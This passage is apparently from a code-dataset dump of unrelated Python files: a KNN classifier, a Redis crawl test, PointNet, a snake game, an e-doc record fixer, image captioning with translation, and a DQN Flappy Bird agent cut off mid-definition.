\"totalX\":[1029], \"totalY\":[642], \"total\":[1340.513905],\"leftClick\": [6], \"rightClick\":[0], \"mouseDown\":[3], \"mouseUp\":[3], \"usernameWPS\":[0.003121452894], \"passwordWPS\":[2.63E-03], \"totalTimeSpent\":[7715], \"countShift\":[1],\"countCapslock\":[0],\"countKey\":[23], \"dwellTimeAverage\":[79.73913043], \"flightTimesAverage\":[348], \"upDownTimeAverage\":[205.9047619]})\n\nprint(X_test)\ny_pred = model.predict(X_test)\n\ny_pred_prob = model.predict_proba(X_test)\nprint(y_pred)\nprint(y_pred_prob)\n\nprint(confusion_matrix(y_test,y_pred))\nprint(classification_report(y_test,y_pred))\n\nprint(accuracy_score(y_test,y_pred)*100)\n\nprint(model.predict_proba(new_input))\n\n# precision = precision_score(y_test, y_pred, average='binary')\n# recall = recall_score(y_test, y_pred, average='binary')\n# score = f1_score(y_test, y_pred, average='binary')\n#\n# print('Recall: %.3f' % recall)\n# print('F-Measure: %.3f' % score)\n\n\n\n","sub_path":"MachineLearning/KNearestNeighbour.py","file_name":"KNearestNeighbour.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231843359","text":"import redis\nimport random\nimport hashlib\nimport json\nimport base64\nfrom LengyueRequestsService.redis_packer import Packer\npool = redis.ConnectionPool(host='127.0.0.1', port=6379, db=0)\nr = redis.StrictRedis(connection_pool=pool)\nhelper = Packer()\n\nfor i in range(1000):\n key = hashlib.md5(str(random.random()).encode()).hexdigest()\n task = json.dumps({\n \"task_id\": key,\n \"method\": \"GET\",\n \"url\": \"https://zhihu.com\",\n \"headers\": {\n },\n \"params\": {\n \"ver\": -1\n },\n \"data\": None,\n \"proxy\": None,\n })\n\n r.lpush('crawl:queue', base64.b64encode(task.encode()))\np = r.pubsub()\np.subscribe(\"crawl:finish\")\nn = 0\nwhile True:\n i = p.get_message()\n if i != None:\n if i[\"type\"] == \"message\":\n j = base64.b64decode(r.get(\"crawl:result:\" + i[\"data\"].decode())).decode()\n j = json.loads(j)\n print(base64.b64decode(j[\"result\"][\"content\"]).decode())\n n += 1\n print(\"Current Recv\", n)","sub_path":"LRS/tests/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"46909486","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport pytorch_utils as pt_utils\nfrom typing import List\n\n\nclass PointNet(nn.Module):\n def __init__(self,*, mlp1:List[int], mlp2:List[int],segmentaion: bool = False, tailmlp:List[int] = None):\n '''\n para mlp: list of int\n para bn: whether to use batchnorm\n '''\n super().__init__()\n self.mlp1 = pt_utils.SharedMLP(mlp1,bn = False)\n self.mlp2 = pt_utils.SharedMLP(mlp2,bn = False)\n self.useforseg = segmentaion\n if segmentaion:\n seg_layers = []\n for k in range(0,tailmlp.__len__()-2):\n seg_layers.append(pt_utils.Conv1d(\n tailmlp[k],\n tailmlp[k+1],\n bn = True\n ))\n seg_layers.append(pt_utils.Conv1d(tailmlp[-2],tailmlp[-1],activation=None))\n self.segmlp = nn.Sequential(*seg_layers)\n else:\n cls_layers = []\n for k in range(0,tailmlp.__len__()-2):\n cls_layers.append(pt_utils.Conv1d(\n tailmlp[k],\n tailmlp[k+1],\n bn = True\n ))\n cls_layers.append(pt_utils.Conv1d(tailmlp[-2],tailmlp[-1],activation=None))\n self.clsmlp = nn.Sequential(*cls_layers)\n\n def forward(self,x):\n n_pts = x.size()[1]\n if self.useforseg:\n x = self.mlp1(x)\n gl_feature = self.mlp2(x)\n gl_feature = torch.max(gl_feature,2,keepdim=True)[0]\n gl_feature = gl_feature.view(-1,1024,1).repeat(1,1,n_pts)\n gl_feature = torch.cat([x,gl_feature],1)\n gl_feature = self.segmlp(gl_feature)\n else:\n x = self.mlp1(x)\n x = self.mlp2(x)\n gl_feature = torch.max(x,2,keepdim=True)[0]\n gl_feature = self.clsmlp(gl_feature)\n\n return gl_feature\n\n\nif __name__ == \"__main__\":\n k = 40\n MLP = [[3,64,64],[64,64,128,1024]]\n\n CLSMLP = [1024,512,256,k]\n\n def getmodel(segmentation: bool = False):\n return PointNet(mlp1 = MLP[0],mlp2 = MLP[1],tailmlp=CLSMLP)\n\n x = torch.rand(8,3,1000)\n model = getmodel()\n y = model(x)\n y = y.view(-1)\n print(y.shape)\n \n\n ","sub_path":"Backup/第五讲思路讲解--王永浩助教/第五讲思路讲解/code_example/pointnet.py","file_name":"pointnet.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231221908","text":"import pygame, sys, random\n\n\nclass pyton(object):\n\tu'''dodajemy historie miejsc gdzie skrecal i koniec, w kazdym ruchu koniec sie porusza, chyba, ze zjadl\n\t\t\tzdaje sie ze trzeba tylko aktualizowac liste, a nie za kazdym razem przesylac nowa bo nie dziala wtedy\n\t\n\t'''\n\tdef __init__(self, game, colour = (255, 0, 0), direction = 'r'):\n\t\tself.game = game\n\t\tself.colour = colour\n\t\tself.direction = direction\n\t\tself.length = 0\n\t\tself.x = self.game.board_size[0][0]+200\n\t\tself.y = self.game.board_size[0][1]+200\n\t\tself.how_big = 20\n\t\tself.head = [self.x, self.y, direction]\t\n\t\tself.end = [self.x-50, self.y, direction]\n\t\tself.track = []\t\t\t#tablica krotek gdzie skret i w ktora strone\t\t\t\t\t\t\t\t\n\t\tself.to_grow = 0\n\t\tself.list_of_boxes = [((self.end[0],self.end[1]),(self.head[0]+self.how_big,self.head[1]+self.how_big))]\n\t\n\tdef t_up(self):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#jeszcze skrecanie trzeba ogarnac\n\t\tif self.direction == 'r' or self.direction == 'l':\n\t\t\tself.direction = 'u'\n\t\t\tself.track.append((self.x, self.y, self.direction))\n\t\t\tself.list_of_boxes[-1] = self.part(-3)\n\t\t\tself.list_of_boxes.append(self.part(-2))\t\t\t\t\t\t#!\n\t\t\n\tdef t_down(self):\n\t\tif self.direction == 'r' or self.direction == 'l':\n\t\t\tself.direction = 'd'\n\t\t\tself.track.append((self.x, self.y, self.direction))\n\t\t\tself.list_of_boxes[-1] = self.part(-3)\n\t\t\tself.list_of_boxes.append(self.part(-2))\t\t\t\t\t\t#!\n\t\t\t\n\tdef t_left(self):\n\t\tif self.direction == 'u' or self.direction == 'd':\n\t\t\tself.direction = 'l'\n\t\t\tself.track.append((self.x, self.y, self.direction))\n\t\t\tself.list_of_boxes[-1] = self.part(-3)\n\t\t\tself.list_of_boxes.append(self.part(-2))\t\t\t\t\t#!\n\t\t\t\n\tdef t_right(self):\n\t\tif self.direction == 'u' or self.direction == 'd':\n\t\t\tself.direction = 'r'\n\t\t\tself.track.append((self.x, self.y, self.direction))\n\t\t\tself.list_of_boxes[-1] = self.part(-3)\n\t\t\tself.list_of_boxes.append(self.part(-2))\t\t\t\t\t\t#!\n\t\t\t\n\tdef move(self):\n\t\tif self.direction == 'u':\n\t\t\tself.y-=self.game.d\n\t\t\tself.list_of_boxes[-1]=self.part(-2)\t\t\t#!\n\t\telif self.direction == 'd':\n\t\t\tself.y+=self.game.d\n\t\t\tself.list_of_boxes[-1]=self.part(-2)\t\t#!\n\t\telif self.direction == 'r':\n\t\t\tself.x+=self.game.d\n\t\t\tself.list_of_boxes[-1]=self.part(-2)\t\t#!\n\t\telif self.direction == 'l':\n\t\t\tself.x-=self.game.d\n\t\t\tself.list_of_boxes[-1]=self.part(-2)\t\t#!\n\t\tself.head[0]=self.x\n\t\tself.head[1]=self.y\n\t\t\n\t\tif self.to_grow > 0:\t\t\t\t\t\t\t\t\t#czy rozciagnac weza\n\t\t\tself.to_grow-=1\t\t\t\t\t\t\t\t\t\t#jezeli jadl to nie przenosimy konca\n\t\telse:\n\t\t\tif self.end[2] == 'u':\n\t\t\t\tself.end[1]-=self.game.d\n\t\t\t\tself.list_of_boxes[0]=self.part(0)\t#!\n\t\t\telif self.end[2] == 'd':\n\t\t\t\tself.end[1]+=self.game.d\n\t\t\t\tself.list_of_boxes[0]=self.part(0)\t#!\n\t\t\telif self.end[2] == 'r':\n\t\t\t\tself.end[0]+=self.game.d\n\t\t\t\tself.list_of_boxes[0]=self.part(0)\t\t#!\n\t\t\telif self.end[2] == 'l':\n\t\t\t\tself.end[0]-=self.game.d\n\t\t\t\tself.list_of_boxes[0]=self.part(0)\t\t#!\n\t\t\t\n\t\t\tif len(self.track)>0:\n\t\t\t\tcel = self.track[0]\n\t\t\t\t'''if self.end[0] == cel[0] and self.end[1] == cel[1]:\n\t\t\t\t\t#print('skret')\n\t\t\t\t\tself.end[2] = cel[2]\t\t\t\t\t\t\t\t\t\t#ponizej rozwiazanie dzialajacce tylko jesli nic innego sie nie popsuje\n\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t'''\t\n\t\t\t\tif self.end[2]=='r':\t\t\t\t\t#przy kazdym takim poleceniu usuwamy ostatni czlon weza\n\t\t\t\t\tif self.end[0] >= cel[0]:\n\t\t\t\t\t\tself.end[2] = cel[2]\n\t\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t\t\tself.list_of_boxes.pop(0)\t\t#!\t\t\t\t\n\t\t\t\telif self.end[2]=='l':\n\t\t\t\t\tif self.end[0] <= cel[0]:\n\t\t\t\t\t\tself.end[2] = cel[2]\n\t\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t\t\tself.list_of_boxes.pop(0)\t\t#!\n\t\t\t\telif self.end[2]=='u':\n\t\t\t\t\tif self.end[1] <= cel[1]:\n\t\t\t\t\t\tself.end[2] = cel[2]\n\t\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t\t\tself.list_of_boxes.pop(0)\t\t#!\n\t\t\t\telif self.end[2]=='d':\n\t\t\t\t\tif self.end[1] >= cel[1]:\n\t\t\t\t\t\tself.end[2] = cel[2]\n\t\t\t\t\t\tself.track.remove(cel)\n\t\t\t\t\t\tself.list_of_boxes.pop(0)\t\t#!\n\t\n\t\t\t\t\n\t\tif True:\t\t\n\t\t\t#chwilowo bez przechodzenia, bariery przy scianach\n\t\t\tif self.x < self.game.board_size[0][0]:\n\t\t\t\tself.game.end()\n\t\t\telif self.x > self.game.board_size[1][0]:\n\t\t\t\tself.game.end()\n\t\t\tif self.y < self.game.board_size[0][1]:\n\t\t\t\tself.game.end()\n\t\t\telif self.y > self.game.board_size[1][1]:\n\t\t\t\tself.game.end()\n\t\n\t\n\tdef box(self):\n\t\tb = pygame.Rect(self.x,self.y,self.how_big,self.how_big)\n\t\treturn b\n\t\n\tdef list_of_parts(self):\t\t#ma zwrocic liste par punktow lt i rb\n\t\tT = []\t\t\t\t\t\t\t#cos tu nie tak\n\t\tL = self.track\n\t\tL.insert(0,self.end)\n\t\tL.append(self.head)\n\t\tt = len(L)\n\t\tfor i in range(t-1):\n\t\t\tcur_pos = L[i]\n\t\t\tnext_pos = L[i+1]\n\t\t\tif cur_pos[2] == 'r':\n\t\t\t\tT.append(((cur_pos[0],cur_pos[1]),(next_pos[0]+self.how_big,next_pos[1]+self.how_big)))\n\t\t\telif cur_pos[2] == 'l':\n\t\t\t\tT.append(((next_pos[0],next_pos[1]),(cur_pos[0]+self.how_big,cur_pos[1]+self.how_big)))\n\t\t\telif cur_pos[2] == 'd':\n\t\t\t\tT.append(((cur_pos[0],cur_pos[1]),(next_pos[0]+self.how_big,next_pos[1]+self.how_big)))\n\t\t\telif cur_pos[2] == 'u':\n\t\t\t\tT.append(((next_pos[0],next_pos[1]),(cur_pos[0]+self.how_big,cur_pos[1]+self.how_big)))\n\n\t\treturn T\n\t\t\n\tdef part(self, i):\n\t\tif i == 0:\n\t\t\tcur_pos = self.end\n\t\t\tif len(self.track) == 0:\n\t\t\t\tnext_pos = self.head\n\t\t\telse:\n\t\t\t\tnext_pos = self.track[0]\n\t\telif i == -2:\n\t\t\tif len(self.track) == 0:\n\t\t\t\tcur_pos = self.end\n\t\t\telse:\t\n\t\t\t\tcur_pos = self.track[-1]\n\t\t\tnext_pos = self.head\n\t\telif i == -3:\n\t\t\tif len(self.track) == 0:\n\t\t\t\tprint(\"nwm cco robic\")\n\t\t\telse:\n\t\t\t\tif len(self.track) == 1:\n\t\t\t\t\tcur_pos = self.end\n\t\t\t\telse:\n\t\t\t\t\tcur_pos = self.track[-2]\n\t\t\t\tnext_pos = self.track[-1]\n\t\telse:\n\t\t\tprint(\"COS NIE TAK\")\n\t\t\n\t\t#L = self.track\n\t\t#L.insert(0,self.end)\n\t\t#L.append(self.head)\t\t#bez sensu\n\t\t#cur_pos = L[i]\n\t\t#next_pos = L[i+1]\n\t\t\n\t\tif cur_pos[2] == 'r':\n\t\t\tT=((cur_pos[0],cur_pos[1]),(next_pos[0]+self.how_big,next_pos[1]+self.how_big))\n\t\telif cur_pos[2] == 'l':\n\t\t\tT=((next_pos[0],next_pos[1]),(cur_pos[0]+self.how_big,cur_pos[1]+self.how_big))\n\t\telif cur_pos[2] == 'd':\n\t\t\tT=((cur_pos[0],cur_pos[1]),(next_pos[0]+self.how_big,next_pos[1]+self.how_big))\n\t\telif cur_pos[2] == 'u':\n\t\t\tT=((next_pos[0],next_pos[1]),(cur_pos[0]+self.how_big,cur_pos[1]+self.how_big))\n\t\treturn T\n\t\t\n\tdef eat(self, how_much):\n\t\tself.length+=how_much\n\n\t\n","sub_path":"pyton.py","file_name":"pyton.py","file_ext":"py","file_size_in_byte":6045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"412800273","text":"import os\nimport sys\n\nArquivosLista \t\t= os.listdir(os.getcwd())\nprint(ArquivosLista)\nArquivosListatxt \t= []\nindex \t\t\t\t= 0\n\nfor Arquivo in ArquivosLista:\n if str(Arquivo).upper().endswith('.TXT'):\n print(str(index) + '\\t' + Arquivo)\n ArquivosListatxt.append(Arquivo)\n index += 1\n\nindiceArq = input('Selecione o arquivo a ser processado:')\n\nprint(ArquivosListatxt[int(indiceArq)])\n\nNomeArquivo = str(ArquivosListatxt[int(indiceArq)])\nArquivoEdoc = open(NomeArquivo, 'r')\nArquivoLinhas = ArquivoEdoc.readlines()\n\nLinhasC600 \t = []\nnrolinha = 0\nNovoArquivo = open('NovoArquivo.txt','w')\nValorC610 = 0\nUltimoC600 = 0\nfor linha in ArquivoLinhas:\n\tlinhaSplit = linha.split('|')[1]\n\tregistro = linhaSplit[1]\n\tif registro == 'C600':\n\t\tLinhaNvC600 = LinhasC600[UltimoC600][1].split('|')\n\t\tLinhaNvC600[22] = str(ValorC610).replace('.',',')\n\n\t\tLinhasC600[UltimoC600][1] = '|'.join(LinhaNvC600)\n\n\t\tUltimoC600 = nrolinha\n\t\tValorC610 = 0\n\n\tif registro == 'C610':\n\t\tValorC610 += float(str(linhaSplit[17]).replace(',','.'))\n\n\tvetor = [registro, linha]\n\tnrolinha += 1\n\tLinhasC600.append(vetor)\n\nfor LinhaNova in LinhasC600:\n\tNovoArquivo.write(LinhaNova[1])\n\nNovoArquivo.close()\nArquivoEdoc.close()","sub_path":"PythonDev/Testes_desenvolvimento/edoc/ArrumaC600Edoc.py","file_name":"ArrumaC600Edoc.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"551134817","text":"import structsvm as ssvm\nimport unittest\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass TestBundleMethod(unittest.TestCase):\n\n def test_quadratic(self):\n\n # f(x) = (x - 1)**2\n def value_gradient(x):\n return (x[0] - 1.0)**2, 2*(x - 1)\n\n bundle_method = ssvm.BundleMethod(\n value_gradient,\n dims=1,\n regularizer_weight=0.0001,\n eps=1e-5)\n\n w = bundle_method.optimize(max_iterations=100)\n self.assertAlmostEqual(w[0], 0.99897, places=4)\n","sub_path":"structsvm/tests/test_bundle_method.py","file_name":"test_bundle_method.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"396952563","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Author : Li Haozheng\n# @Time : 2019/3/22 16:26\n\n# 模式(GrayMode,ColorMode, MosaicMode)\nMODEL = 'GrayMode' # GrayMode or ColorMode or MosaicMode\n\n# 图片路径,可以是http图片\nPICTURE_PATH = r'demo/demo.jpg' # Set local picture or internet picture.\n\n# 输出路径\nOUTPUT_PATH = 'demo/grayMode.js'\n\n# 图片高度(字符数量),宽度只有在输出图片变形的情况下使用\nHEIGHT = 30\n# WIDTH =\n# WIDTH is not necessary.\n\n# MosaicMode和ColorMode的填充字符,可以是单字,推荐'#',可以是中文或数字,但中文不能和英文或数字混杂\nColorModeChar = 'EMIYA' # Don't set '%' ! Recommend character: '#', '@', '&'.\n\n# 输出字号\nColorModeFontSize = 12 # minimum size is 10, default size is 12\n\n# 背景颜色(仅限 GrayMode 或者 ColorMode)\nBackgroundColor = '#ffffff'","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79373562","text":"import requests\n# If you are using a Jupyter notebook, uncomment the following line.\n#%matplotlib inline\n# import matplotlib.pyplot as plt\nfrom PIL import Image\nfrom io import BytesIO\nimport os\nimport sys\nimport urllib.request\nimport json\nimport ast\n\nwith open('vvvp/metadata/keys.json') as f:\n js = f.read()\n keys=ast.literal_eval(js)\n\ndef vision_im2txt(img):\n api_key = keys['vision_api']\n assert api_key\n vision_base_url = \"https://koreacentral.api.cognitive.microsoft.com/vision/v1.0/analyze\"\n image_data = img\n #image_path = 'c:/surround_system_pro/vvvp/alone.jpg'\n #image_data = open(image_path, \"rb\").read()\n params = {'visualFeatures': 'Categories,Description,Color'}\n headers = {'Ocp-Apim-Subscription-Key': api_key,'Content-Type': 'application/octet-stream'}\n response = requests.post(vision_base_url, headers=headers,params=params, data=image_data)\n # response.raise_for_status()\n\n response.text\n res = json.loads(response.text)\n # print(str(res) + '------------------------' , flush=True)\n\n result = res['description']['captions'][0]['text']\n return result\n\ndef translate(result):\n\n client_id = keys['papago_api'][0]['id']\n client_secret = keys['papago_api'][0]['secret']\n\n encText = urllib.parse.quote(result)\n data = \"source=en&target=ko&text=\" + encText\n url = \"https://openapi.naver.com/v1/papago/n2mt\"\n request = urllib.request.Request(url)\n\n request.add_header(\"X-Naver-Client-Id\",client_id)\n request.add_header(\"X-Naver-Client-Secret\",client_secret)\n response = urllib.request.urlopen(request, data=data.encode(\"utf-8\"))\n\n rescode = response.getcode()\n if(rescode==200):\n response_body = response.read()\n response_json = json.loads(response_body.decode('utf-8'))\n print(response_json['message']['result']['translatedText'])\n text = response_json['message']['result']['translatedText']\n return text\n else:\n print(\"Error Code:\" + rescode)\n","sub_path":"vvvp/analyze_image.py","file_name":"analyze_image.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580893289","text":"infile = open('.input.dat', 'r')\nfor line in infile:\n # Typical line: variable = value\n variable, value = line.split('=')\n variable = variable.strip() # remove leading/traling blanks\n if variable == 'v0':\n v0 = float(value)\n elif variable == 'a':\n a = float(value)\n elif variable == 'dt':\n dt = float(value)\n elif variable == 'interval':\n interval = eval(value)\ninfile.close()\n\nt_values = []\ns_values = []\nn = int(round(interval[1]/dt)) + 1 # No of t values\nfor i in range(n):\n t = i*dt\n s = v0*t + 0.5*a*t**2\n t_values.append(t)\n s_values.append(s)\n\n# Write nicely formatted table to file\noutfile = open('table1.dat', 'w')\noutfile.write('# t s(t)\\n') # write table header\nfor t, s in zip(t_values, s_values):\n outfile.write('%.2f %.4f\\n' % (t, s))\n\n# Alternative: use numpy.savetxt\nimport numpy as np\n# Make two-dimensional array of [t, s(t)] values in each row\ndata = np.array([t_values, s_values]).transpose()\n\n# Write data array to file in table format\nnp.savetxt('table2.dat', data, fmt=['%.2f', '%.4f'],\n header='t s(t)', comments='# ')\n\n# Read the file back\ndata = np.loadtxt('table2.dat', comments='#')\n","sub_path":"doc/src/src-bumpy/for_file_read_input.py","file_name":"for_file_read_input.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"230656095","text":"'''\n输入: [1,2,3]\n输出: [1,2,4]\n解释: 输入数组表示数字 123。\n\n输入: [4,3,2,1]\n输出: [4,3,2,2]\n解释: 输入数组表示数字 4321。\n\n\n要考虑进位的情况,判断最后一位是否为9 如果为9 数组应该继续去判断上一位是否为9\n这里可以用迭代的方法 数组去掉最后一位 一直去迭代判断\n'''\n\ndef plusOne(d):\n\tif len(d) == 0:\n\t\treturn [1]\n\telif d[-1] == 9:\n\t\td = plusOne(d[:-1])\n\t\td.extend([0])\n\telse:\n\t\td[-1] += 1\n\treturn d\n\nprint(plusOne([4,3,1,5,7,8,9]))","sub_path":"LeetCode/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14760507","text":"#!/usr/bin/env python\r\nfrom __future__ import print_function # 新版本特性\r\n\r\nimport tensorflow as tf\r\nimport cv2\r\nimport sys\r\nsys.path.append(\"game/\")\r\nimport wrapped_flappy_bird as game\r\nimport random\r\nimport numpy as np\r\nfrom collections import deque # 双端队列\r\n\r\n# 参数\r\nGAME = 'bird' # 游戏名称\r\nACTIONS = 2 # 动作种类 上or下\r\nGAMMA = 0.99 # Q-learning 衰减率α\r\nOBSERVE = 100. # 经验池的样本数\r\nEXPLORE = 200000. # frames over which to anneal epsilon\r\nFINAL_EPSILON = 0.001 # 结束探索时候的选择动作的ε概率\r\nINITIAL_EPSILON = 0.01 # 开始探索时候的选择动作的ε概率\r\nREPLAY_MEMORY = 50000 # 经验池的最大内存\r\nBATCH = 32 # 随机抽样的样本数\r\nFRAME_PER_ACTION = 1\r\nUPDATE_TIME = 100 #更新目标网络\r\n\r\n\r\nclass DQN_NATURE:\r\n\r\n\tdef __init__(self):\r\n\t\t# 初始化经验池\r\n\t\tself.memory = deque()\r\n\t\t# 初始化步数 检测模型保存和EPSILION的改变\r\n\t\tself.timeStep = 0\r\n\t\tself.epsilon = INITIAL_EPSILON\r\n\t\t\r\n\t\t# 初始化当前Q网络\r\n\t\tself.stateInput,self.QValue,self.W_conv1,self.b_conv1,self.W_conv2,self.b_conv2,self.W_conv3,self.b_conv3,self.W_fc1,self.b_fc1,self.W_fc2,self.b_fc2 = self.createNetwork()\r\n\t\t# 初始化目标Q网络\r\n\t\tself.stateInputT,self.QValueT,self.W_conv1T,self.b_conv1T,self.W_conv2T,self.b_conv2T,self.W_conv3T,self.b_conv3T,self.W_fc1T,self.b_fc1T,self.W_fc2T,self.b_fc2T = self.createNetwork()\r\n\t\t#将当前Q网络赋值给目标Q网络 tf.assign为赋值操作\r\n\t\tself.copyTargetQNetworkOperation = [self.W_conv1T.assign(self.W_conv1),self.b_conv1T.assign(self.b_conv1),self.W_conv2T.assign(self.W_conv2),self.b_conv2T.assign(self.b_conv2),self.W_conv3T.assign(self.W_conv3),self.b_conv3T.assign(self.b_conv3),self.W_fc1T.assign(self.W_fc1),self.b_fc1T.assign(self.b_fc1),self.W_fc2T.assign(self.W_fc2),self.b_fc2T.assign(self.b_fc2)]\r\n\t\t#初始化损失函数\r\n\t\tself.createTrainingMethod()\r\n\t\t\r\n\t\t# 保存和加载网络模型\r\n\t\t# TensorFlow采用Saver来保存。一般在Session()建立之前,通过tf.train.Saver()获取Saver��例\r\n\t\tself.saver = tf.train.Saver()\r\n\t\tself.sess = tf.InteractiveSession()\r\n\t\tself.sess.run(tf.initialize_all_variables())\r\n\t\t#如果检查点存在就载入已经有的模型\r\n\t\tcheckpoint = tf.train.get_checkpoint_state(\"saved_networks\")\r\n\t\tif checkpoint and checkpoint.model_checkpoint_path:\r\n\t\t\tself.saver.restore(sess, checkpoint.model_checkpoint_path)\r\n\t\t\tprint(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\r\n\t\telse:\r\n\t\t\tprint(\"Could not find old network weights\")\r\n\t\t\r\n\t\t\r\n\t# 初始化当前状态\r\n\tdef setInitState(self,observation):\r\n\t\tself.currentState = np.stack((observation, observation, observation, observation), axis = 2)\r\n\r\n # 构建CNN卷积神经网络\r\n # 权重 tf.truncated_normal(shape, mean, stddev):\r\n # shape表示生成张量的维度,mean是均值,stddev是标准差 一个截断的产生正太分布的函数 \r\n # TensorFlow的世界里,变量的定义和初始化是分开的 tf.Variable(initializer,name),initializer是初始化参数,name是可自定义的变量名称\r\n\tdef weight_variable(self, shape):\r\n\t\tinitial = tf.truncated_normal(shape, stddev = 0.01) \r\n\t\treturn tf.Variable(initial)\r\n\r\n # 偏置 TensorFlow创建常量tf.constant\r\n\tdef bias_variable(self, shape):\r\n\t\tinitial = tf.constant(0.01, shape = shape)\r\n\t\treturn tf.Variable(initial)\r\n\r\n\t# 卷积 tf.nn.conv2d(input, filter, strides, padding, use_cudnn_on_gpu=None, name=None)\r\n\t# input -- 卷积输入图像 Tensor [batch, in_height, in_width, in_channels] [训练时一个batch的图片数量, 图片高度, 图片宽度, 图像通道数] \r\n\t# filter -- 卷积核 Tensor [filter_height, filter_width, in_channels, out_channels] [卷积核的高度,卷积核的宽度,图像通道数,卷积核个数] \r\n\t# strides -- 卷积时在图像每一维的步长 步长不为1的情况,文档里说了对于图片,因为只有两维,通常strides取[1,stride,stride,1]\r\n\t#\t padding -- \"SAME\",\"VALID\" SAME: 输出大小等于输入大小除以步长 VALID: 输出大小等于输入大小减去滤波器大小加上1,最后再除以步长 向上取整\r\n\tdef conv2d(self, x, W, stride):\r\n\t\treturn tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = \"SAME\")\r\n\r\n\t# 池化 tf.nn.max_pool(value, ksize, strides, padding, name=None)\r\n\t# 输入 [batch, height, width, channels] \r\n\t#\t 池化窗口大小 池化窗口的大小,取一个四维向量,一般是[1, height, width, 1],因为我们不想在batch和channels上做池化,所以这两个维度设为了1\r\n\t# 步长 和卷积类似,窗口在每一个维度上滑动的步长,一般也是[1, stride,stride, 1]\r\n\t#\t 填充 \"SAME\",\"VALID\"\r\n\tdef max_pool_2x2(self, x):\r\n\t\treturn tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = \"SAME\")\r\n\r\n\t# 构建CNN模型 inputState QValue\r\n\tdef createNetwork(self):\r\n\t\t# 第一层卷积 卷积核 8*8*4*32\r\n\t\tW_conv1 = self.weight_variable([8, 8, 4, 32])\r\n\t\tb_conv1 = self.bias_variable([32])\r\n\t\t# 第二层卷积 卷积核 4*4*32*64\r\n\t\tW_conv2 = self.weight_variable([4, 4, 32, 64])\r\n\t\tb_conv2 = self.bias_variable([64])\r\n\t\t# 第三层卷积 卷积核 3*3*64*64\r\n\t\tW_conv3 = self.weight_variable([3, 3, 64, 64])\r\n\t\tb_conv3 = self.bias_variable([64])\r\n\t\t# 第一层全连接 1600 - 512\r\n\t\tW_fc1 = self.weight_variable([1600, 512])\r\n\t\tb_fc1 = self.bias_variable([512])\r\n\t\t# 第二层全连接 512 - 2\r\n\t\tW_fc2 = self.weight_variable([512, ACTIONS])\r\n\t\tb_fc2 = self.bias_variable([ACTIONS])\r\n\t\t\r\n\t\t# 输入层\r\n\t\tstateInput = tf.placeholder(\"float\", [None, 80, 80, 4])\r\n\r\n\t\t# 第一层隐藏层+池化层 tf.nn.relu激活函数 80*80*4 -> 20*20*32 80/4 = 20\r\n\t\th_conv1 = tf.nn.relu(self.conv2d(stateInput, W_conv1, 4) + b_conv1) # 80*80*4 -> 20*20*32 80/4 = 20\r\n\t\th_pool1 = self.max_pool_2x2(h_conv1) # 20*20*32 -> 10*10*32 20/2 = 10\r\n\t\t# 第二层隐藏层(这里只用了一层池化层)\r\n\t\th_conv2 = tf.nn.relu(self.conv2d(h_pool1, W_conv2, 2) + b_conv2) # 10*10*32 -> 5*5*64 10/2 = 5\r\n\t\t# h_pool2 = max_pool_2x2(h_conv2)\r\n\t\t# 第三层隐藏层\r\n\t\th_conv3 = tf.nn.relu(self.conv2d(h_conv2, W_conv3, 1) + b_conv3) # 5*5*64 -> 5*5*64 5/1 = 5\r\n\t\t# h_pool3 = max_pool_2x2(h_conv3)\r\n\t\t# Reshape\r\n\t\t#h_pool3_flat = tf.reshape(h_pool3, [-1, 256])\r\n\t\th_conv3_flat = tf.reshape(h_conv3, [-1, 1600]) # 5*5*64 = 1600 n*1600 --1600\r\n\t\t# 全连接层\r\n\t\th_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1) # 1600*512 -- 512\r\n\t\t# 输出层\r\n\t\t# readout layer 动作的Q值\r\n\t\tQValue = tf.matmul(h_fc1, W_fc2) + b_fc2 # 512*2 -- 2\r\n\t\t\r\n\t\treturn stateInput,QValue,W_conv1,b_conv1,W_conv2,b_conv2,W_conv3,b_conv3,W_fc1,b_fc1,W_fc2,b_fc2\r\n\t\t\r\n\t#赋值目标Q网络\r\n\tdef copyTargetQNetwork(self):\r\n\t\tself.sess.run(self.copyTargetQNetworkOperation)\r\n\t\t\r\n\t\t# 损失函数\r\n\tdef createTrainingMethod(self):\r\n\t\t# 